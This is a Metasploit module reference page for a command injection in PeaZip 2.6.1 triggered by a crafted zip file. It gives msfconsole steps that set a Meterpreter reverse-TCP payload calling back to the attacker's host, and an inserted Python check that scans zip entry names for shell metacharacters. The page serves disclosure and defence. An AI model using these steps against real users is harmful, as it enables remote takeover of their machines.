PeaZip <= 2.6.1 Zip Processing Command Injection
This module exploits a command injection vulnerability in PeaZip. All versions prior to 2.6.2 are suspected vulnerable. Testing was conducted with version 2.6.1 on Windows. In order for the command to be executed, an attacker must convince someone to open a specially crafted zip file with PeaZip, and access the specially crafted file by double-clicking it. By doing so, an attacker can execute arbitrary commands as the victim user.
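A defender-side check for the kind of archive described above, added here as an example and not part of the Metasploit module or of PeaZip: it lists zip entry names and flags characters that Windows forbids in file names or that cmd.exe treats as operators. It assumes the injected command is carried in an entry name, which the page does not spell out; the function names and the sample archive are constructed for illustration.

```python
import io
import zipfile

# Characters Windows forbids in file names; several are also cmd.exe operators.
WINDOWS_ILLEGAL = set('<>:"|?*')
# Further cmd.exe metacharacters that are legal in names but risky when a
# tool pastes the name into a command line (assumed risk model).
SHELL_META = set('&^%`$;')


def audit_entry_name(name):
    """Return a sorted list of reasons an entry name is suspicious."""
    reasons = set()
    # Check each path component; zip uses '/', crafted names may use '\\'.
    for part in name.replace("\\", "/").split("/"):
        if any(ch in WINDOWS_ILLEGAL for ch in part):
            reasons.add("windows-illegal-char")
        if any(ch in SHELL_META for ch in part):
            reasons.add("shell-metachar")
        if any(ord(ch) < 0x20 for ch in part):
            reasons.add("control-char")
    return sorted(reasons)


def audit_zip(data):
    """Map each suspicious entry name in a zip (given as bytes) to its reasons."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            reasons = audit_entry_name(info.filename)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample():
    """Constructed sample archive: one ordinary entry, two suspicious names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "ordinary entry")
        zf.writestr('report"|PLACEHOLDER|.txt', "constructed name")
        zf.writestr("a&b.txt", "constructed name")
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in audit_zip(build_sample()).items():
        print(f"{name!r}: {', '.join(reasons)}")
```

Only names are inspected and nothing is extracted, so the check can run on a mail gateway or file share before a user opens the archive.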
Exploit Rank
- Excellent
Exploit Authors
- Nine:Situations:Group::pyrokinesis
- jduck < jduck [at] metasploit.com >
Exploit Targets
- 0 - Automatic (default)
Exploit Usage Information
$ msfconsole
msf > use exploit/multi/fileformat/peazip_command_injection
msf exploit(peazip_command_injection) > show payloads
msf exploit(peazip_command_injection) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(peazip_command_injection) > set LHOST [MY IP ADDRESS]
msf exploit(peazip_command_injection) > exploit
Exploit Module Options
| Option | Description |
| --- | --- |
| FILENAME | The file name. (default: msf.zip) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
